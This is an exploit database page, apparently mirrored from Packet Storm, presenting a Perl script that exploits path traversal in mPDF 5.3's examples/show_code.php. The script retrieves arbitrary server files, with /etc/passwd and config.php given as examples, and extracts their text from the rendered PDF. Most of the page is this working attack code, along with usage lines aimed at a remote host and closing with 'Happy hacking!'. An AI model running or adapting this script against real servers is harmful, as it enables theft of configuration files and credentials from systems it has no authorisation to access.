Lucene search
K

mPDF 5.3 File Disclosure

🗓️ 16 Dec 2011 00:00:00Reported by ZadYreeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

mPDF 5.3 File Disclosure Exploit allows downloading unprotected remote content in PDF format. It exploits weak URI filtering in examples/show_code.php

Code
`# Exploit Title: mPDF <= 5.3 File Disclosure  
# Google Dork: Please no dork  
# Date: 16th December 2011  
# Author: ZadYree  
# Software Link: http://www.mpdf1.com/mpdf/download  
# Version: 5.3 and prior  
# Tested on: Multiple  
# CVE : N/A  
  
#!/usr/bin/perl -U  
=head1 TITLE  
  
mPDF <= 5.3 File Disclosure Exploit (0day)  
  
=head2 SYNOPSIS  
  
-- examples/show_code.php --  
  
preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI unproperly filtered.  
$num = intval($m[1]);  
$title = ucfirst(preg_replace('/_/',' ',$m[2]));  
  
if (!$num || !$title) { die("Invalid file"); }  
  
=head2 DESCRIPTION  
  
This vulnerability, due to a weak filter, lets you download any unprotected remote  
content, under PDF format.  
The exploit may not work, depending on the set up htaccess/chmod rules on the  
remote server.  
  
=head2 USAGE  
  
perl exploit.pl -r http://p00niez.com/mpdf53/ ../config.php  
perl exploit.pl -a http://p00niez.com/mpdf53/ /etc/passwd  
  
Requiered modules:  
PDF::OCR2  
LWP::Simple  
File::Type  
  
Download a module:  
sudo cpan -fi install Module::Name  
  
=head3 Author  
  
Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog  
  
=head3 Thanks  
  
PHDays CTF - Yes, CTFs sometime do give you 0dayz  
3LRVS Team - Support  
  
=cut  
  
#************* Configuration **************#  
my $pdf_file = '/tmp/b00m.pdf';  
$PDF::OCR2::CHECK_PDF = 0;  
$del_temp_file = 1;  
#******************************************#  
  
  
use 5.010;  
use PDF::OCR2;  
use Getopt::Std;  
use LWP::Simple;  
use File::Type;  
use constant TRUE => 1;  
use constant FALSE => 0;  
  
help() unless (@ARGV >= 2);  
  
my (%optz, $uri);  
getopts('rah', \%optz);  
my $relative = $optz{'r'};  
my $absolute = $optz{'a'};  
my $help = $optz{'h'};  
help() unless ($absolute || $relatife);  
  
my ($purl, $fpath) = @ARGV;  
  
my $name = $purl;  
$name =~ s{http://(.+?)/.*} {$1};  
$name .= ("_" . localtime(time) . ".txt");  
  
  
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);  
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);  
  
help() unless ($uri);  
  
my $furl = $purl . $uri . $fpath;  
$furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.  
  
say "[*]Retrieving content...";  
my $file = make_file(get($furl));  
die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);  
  
say "[+]OK\012[*]Converting format...";  
$pdf = PDF::OCR2->new($file);  
  
my $text = $pdf->text;  
$text =~ s/[^\x0A-\x7F]+?//gm;  
  
open(my $fh, '>', $name);  
print $fh $text;  
close($fh);  
  
say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;  
  
unlink($pdf_file) if ($del_temp_file == TRUE);  
  
  
  
sub make_file {  
my $content = shift;  
open($fh, '>', $pdf_file);  
print $fh $content;  
close($fh);  
return($pdf_file);  
}  
  
sub is_pdf {  
my $checked_file = shift;  
my $ft = File::Type->new();  
return(1) if ($ft->mime_type($checked_file) eq "application/pdf");  
return(0);  
}  
  
help() if ($help);  
  
sub help {  
say <<"EOF";  
  
Usage: perl $0 [-r|-a] http://[mPDF URL] <file_to_read>  
  
Details:   
-r : Relative path (ex: ../file.php)  
-a : Absolute path (ex: /etc/file.zd)  
  
For any more information, feel free to contact ZadYree  
Happy hacking!  
EOF  
exit(0);  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Dec 2011 00:00Current
7.4High risk
Vulners AI Score7.4
25